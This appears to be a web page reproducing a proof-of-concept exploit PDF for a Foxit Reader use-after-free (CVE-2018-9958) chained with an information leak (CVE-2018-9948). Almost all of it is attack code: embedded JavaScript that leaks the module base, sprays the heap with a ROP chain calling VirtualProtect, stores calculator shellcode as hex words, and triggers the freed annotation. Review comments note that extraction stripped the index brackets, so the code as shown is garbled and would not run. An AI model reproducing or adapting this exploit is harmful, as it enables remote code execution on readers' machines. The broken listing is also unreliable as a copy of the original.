
CVE-2018-9958 Foxit Reader 9.0.1.1049 缓冲区溢出漏洞



EXP

%PDF 
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>> 
2 0 obj
<</S /JavaScript /JS (
/*
#---------------------------------------------------------------------------------------------------#
# Exploit Title   : Foxit Reader RCE with DEP bypass on Heap with shellcode                         #
# Date            : 08/04/2018 (4 Aug)                                                              #
# Exploit Author  : Manoj Ahuje                                                                     #
# Tested on       : Windows 7 Pro (x32)                                                             #
# Software Link   : https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version         : Foxit Reader 9.0.1.1049                                                         #
# CVE             : CVE-2018-9958, CVE-2018-9948                                                    #
# Credits to "Mr_Me" for Research and initial exploit                                               #
#---------------------------------------------------------------------------------------------------#
*/
// Module-level state shared by the stages defined below.
var heap_ptr  = 0;   // assigned here only; never read anywhere in this listing
var foxit_base = 0;  // written by leak(), read by heap_spray()

/**
 * Heap-spray stage: allocates `size` ArrayBuffers of 0x10000-0x8 bytes each and
 * writes values derived from the global `foxit_base` (set earlier by leak()),
 * followed by constant fill values, into each one. The per-slot comments are the
 * original author's; nothing beyond what is written there is known from this page.
 *
 * NOTE(review): as this listing was extracted, the indexed writes appear without
 * their brackets (`arri`, `claimed0x00`, `claimedj`), so they are assignments to
 * implicit globals and `claimed` / `c_length` are never read. Treat this page as a
 * non-executable reference, not a faithful copy of the original PoC.
 *
 * Detection note: a PDF whose /OpenAction runs JavaScript that allocates many
 * large ArrayBuffers in a tight loop (as here) is a common heap-spray indicator
 * worth flagging in document sandboxing / mail-gateway analysis.
 *
 * @param {number} size number of buffers to allocate
 * @returns {undefined}
 */
function heap_spray(size){
    var arr = new Array(size);
    for (var i = 0; i < arr.length; i++) {
    
        // re-claim and stack pivot-0x8
        arri = new ArrayBuffer(0x10000-0x8);//0xFFF8
        var claimed = new Int32Array(arri);
        var c_length = claimed.length;
   
/* custom made ROP chain virtualalloc call
   Author: Manoj Ahuje  */
	    
	claimed0x00 = foxit_base + 0x01A65184; //# PUSH EAX # POP ESP # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	claimed0x01 = foxit_base + 0x01A65184;
	claimed0x02 = foxit_base + 0x01A65184;
	claimed0x03 = foxit_base + 0x01A65184;
    claimed0x04 = foxit_base + 0x14f9195;  // # POP EBX # RETN
    claimed0x05 = foxit_base + 0x41414141; // 
	claimed0x06 = foxit_base + 0x1f224fc;  // # ptr to &VirtualProtect()
        claimed0x07 = foxit_base + 0x0e70281;  // # MOV ESI,DWORD PTR DS:EBX # RETN 
        claimed0x08 = foxit_base + 0x1582698;  // # POP EBP # RETN 
        claimed0x09 = foxit_base + 0xa0dbd;    // # & jmp esp 
        claimed0x0a = foxit_base + 0x14ed06d;  // # POP EBX # RETN  
        claimed0x0b = 0x00000201;              // # 0x00000201-> ebx
        claimed0x0c = foxit_base + 0x1e62f7e;  // # POP EDX # RETN  
        claimed0x0d = 0x00000040;              // # 0x00000040-> edx
        claimed0x0e = foxit_base + 0x1ec06a9;  // # POP ECX # RETN 
        claimed0x0f = foxit_base + 0x29bac74;  // # &Writable location 
        claimed0x10 = foxit_base + 0xb971f;    // # POP EDI # RETN  
        claimed0x11 = foxit_base + 0x177769e;  // # RETN (ROP NOP) 
        claimed0x12 = foxit_base + 0x1A89808;  // # POP EAX # RETN 
        claimed0x13 = 0x90909090;              // # nop
        claimed0x14 = foxit_base + 0x129d4f0;  // # PUSHAD # RETN  
	claimed0x15 = 0x90909090;
	claimed0x16 = 0x90909090;
	claimed0x17 = 0x90909090;
	claimed0x18 = 0x90909090;
	claimed0x19 = 0x90909090;
	claimed0x1a = 0x90909090;
	    
//regular CALCULATOR shellcode from msf
	    
        claimed0x1b = 0xe5d9e389;
        claimed0x1c = 0x5af473d9;
        claimed0x1d = 0x4a4a4a4a;
        claimed0x1e = 0x4a4a4a4a;
        claimed0x1f = 0x434a4a4a;
        claimed0x20 = 0x43434343;
        claimed0x21 = 0x59523743;
        claimed0x22 = 0x5058416a;
        claimed0x23 = 0x41304130;
        claimed0x24 = 0x5141416b;
        claimed0x25 = 0x32424132;
        claimed0x26 = 0x42304242;
        claimed0x27 = 0x58424142;
        claimed0x28 = 0x42413850;
        claimed0x29 = 0x49494a75;
        claimed0x2a = 0x4e586b6c;
        claimed0x2b = 0x57306362;
        claimed0x2c = 0x53707770;
        claimed0x2d = 0x6b696e50;
        claimed0x2e = 0x39716455;
        claimed0x2f = 0x6e645050;
        claimed0x30 = 0x6470426b;
        claimed0x31 = 0x434b6c70;
        claimed0x32 = 0x6e6c3662;
        claimed0x33 = 0x7562436b;
        claimed0x34 = 0x526b6e44;
        claimed0x35 = 0x46686452;
        claimed0x36 = 0x5037386f;
        claimed0x37 = 0x6446764a;
        claimed0x38 = 0x4e4f4b71;
        claimed0x39 = 0x354c774c;
        claimed0x3a = 0x776c6131;
        claimed0x3b = 0x374c7672;
        claimed0x3c = 0x5a614a50;
        claimed0x3d = 0x374d746f;
        claimed0x3e = 0x38573971;
        claimed0x3f = 0x30525a62;
        claimed0x40 = 0x6e376652;
        claimed0x41 = 0x6252506b;
        claimed0x42 = 0x624b6c30;
        claimed0x43 = 0x6c4c576a;
        claimed0x44 = 0x476c524b;
        claimed0x45 = 0x6d387461;
        claimed0x46 = 0x43587133;
        claimed0x47 = 0x50513831;
        claimed0x48 = 0x334b6c51;
        claimed0x49 = 0x35506769;
        claimed0x4a = 0x6e534851;
        claimed0x4b = 0x7539576b;
        claimed0x4c = 0x54736948;
        claimed0x4d = 0x4e79637a;
        claimed0x4e = 0x6c64356b;
        claimed0x4f = 0x6a51354b;
        claimed0x50 = 0x39514676;
        claimed0x51 = 0x6f4c6e6f;
        claimed0x52 = 0x444f4831;
        claimed0x53 = 0x4861364d;
        claimed0x54 = 0x6b783447;
        claimed0x55 = 0x69357450;
        claimed0x56 = 0x73337366;
        claimed0x57 = 0x5568494d;
        claimed0x58 = 0x474d436b;
        claimed0x59 = 0x68357454;
        claimed0x5a = 0x4e686364;
        claimed0x5b = 0x6638466b;
        claimed0x5c = 0x59313344;
        claimed0x5d = 0x6c766143;
        claimed0x5e = 0x506c664b;
        claimed0x5f = 0x504b4c4b;
        claimed0x60 = 0x656c4758;
        claimed0x61 = 0x6c436951;
        claimed0x62 = 0x6e34634b;
        claimed0x63 = 0x6831436b;
        claimed0x64 = 0x61694e50;
        claimed0x65 = 0x65746554;
        claimed0x66 = 0x514b5174;
        claimed0x67 = 0x7351734b;
        claimed0x68 = 0x427a6269;
        claimed0x69 = 0x396f6971;
        claimed0x6a = 0x734f5170;
        claimed0x6b = 0x4e6a436f;
        claimed0x6c = 0x7832526b;
        claimed0x6d = 0x316d4e6b;
        claimed0x6e = 0x675a534d;
        claimed0x6f = 0x4f4d6c71;
        claimed0x70 = 0x57324875;
        claimed0x71 = 0x43707770;
        claimed0x72 = 0x61306630;
        claimed0x73 = 0x6e514678;
        claimed0x74 = 0x6e6f706b;
        claimed0x75 = 0x6b6f5967;
        claimed0x76 = 0x784b4f65;
        claimed0x77 = 0x39656d70;
        claimed0x78 = 0x73565032;
        claimed0x79 = 0x6c666c58;
        claimed0x7a = 0x6d6d4d55;
        claimed0x7b = 0x496f494d;
        claimed0x7c = 0x456c6545;
        claimed0x7d = 0x454c7356;
        claimed0x7e = 0x6b306b5a;
        claimed0x7f = 0x5370394b;
        claimed0x80 = 0x4d453445;
        claimed0x81 = 0x6567426b;
        claimed0x82 = 0x70426343;
        claimed0x83 = 0x376a506f;
        claimed0x84 = 0x6b336670;
        claimed0x85 = 0x3045694f;
        claimed0x86 = 0x72313563;
        claimed0x87 = 0x7633654c;
        claimed0x88 = 0x4235754e;
        claimed0x89 = 0x67354558;
        claimed0x8a = 0x00414170;

        // Fill the remainder of the view with one repeated constant.
        for (var j = 0x8b; j < c_length; j++) {
            claimedj = 0x6d616e6a;
        }
    }
}

/**
 * Information-disclosure stage (the author's header cites CVE-2018-9948):
 * creates and immediately destroys a Text annotation, allocates a 0x60-byte
 * ArrayBuffer with an Int32Array view, and derives the global `foxit_base`
 * from a masked value minus the hard-coded offset below, which the author ties
 * to a single FoxitReader.exe build (see the sha1 in the comment).
 *
 * Depends on `this.addAnnot`, a document-level API of the reader's JavaScript
 * environment, not standard ECMAScript.
 *
 * NOTE(review): `stolen0` is an undeclared identifier as written (reading it
 * throws a ReferenceError), so this listing is not runnable as shown; the index
 * brackets appear to have been lost in extraction.
 *
 * @returns {undefined} side effect: sets the module-level `foxit_base`
 */
function leak(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found By: bit from meepwn team
    */

    // alloc
    var a = this.addAnnot({type: "Text"});

    // free
    a.destroy();

    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    // leak the vftable
    var leaked = stolen0 & 0xffff0000;

    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
    // Build-specific: any other binary would yield a wrong base.
    foxit_base = leaked-0x01f50000;
}

/**
 * Allocation stage invoked from the getter in trigger_uaf(): 0x10 times,
 * allocates a 0x60-byte ArrayBuffer (the same size leak() uses) with an
 * Int32Array view and writes the constants below into it.
 *
 * NOTE(review): `arri`, `rop0x00` and `ropj` are implicit globals as written;
 * the indexed form was evidently lost in extraction, so `rop` is never read
 * and the function is not a faithful copy of the original.
 *
 * @returns {undefined}
 */
function reclaim(){

    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arri = new ArrayBuffer(0x60);
        var rop = new Int32Array(arri);
		
        rop0x00 = 0x11000048;
        
        for (var j = 0x01; j < rop.length; j++) {
            ropj = 0x71727374;
        }
    }
}

/**
 * Trigger stage (the author's header cites CVE-2018-9958): adds a Text
 * annotation named "uaf" on page 0, then assigns its `point` property a value
 * whose index-0 getter destroys that same annotation via `that.getAnnot(0, "uaf")`,
 * calls reclaim(), and returns 1. Per the inline comments, the free therefore
 * happens while the reader is still processing the `point` assignment.
 *
 * Depends on `this.addAnnot` / `this.getAnnot`, document-level APIs of the
 * reader's JavaScript environment.
 *
 * NOTE(review): `arr` is the primitive number 1; in a conformant ES5+ engine
 * Object.defineProperties on a primitive throws a TypeError, so this relies on
 * the embedded engine's behaviour — TODO confirm against the target build.
 *
 * @returns {undefined}
 */
function trigger_uaf(){
    /*
        Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
        ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
        Found By: Steven Seeley (mr_me) of Source Incite
    */

    var that = this;  // captured so the getter can reach the document object
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = 1;
    Object.defineProperties(arr,{
        "0":{ 
            get: function () {

                // free
                that.getAnnot(0, "uaf").destroy();

                // reclaim freed memory
                reclaim();
                return 1; 
            }
        }
    });
    a.point = arr;
}

// Document-action body: the stages run in this fixed order — derive
// `foxit_base`, spray 0x1000 buffers, then trigger the annotation bug.
leak();
heap_spray(0x1000);

trigger_uaf();

)>> trailer <</Root 1 0 R>>
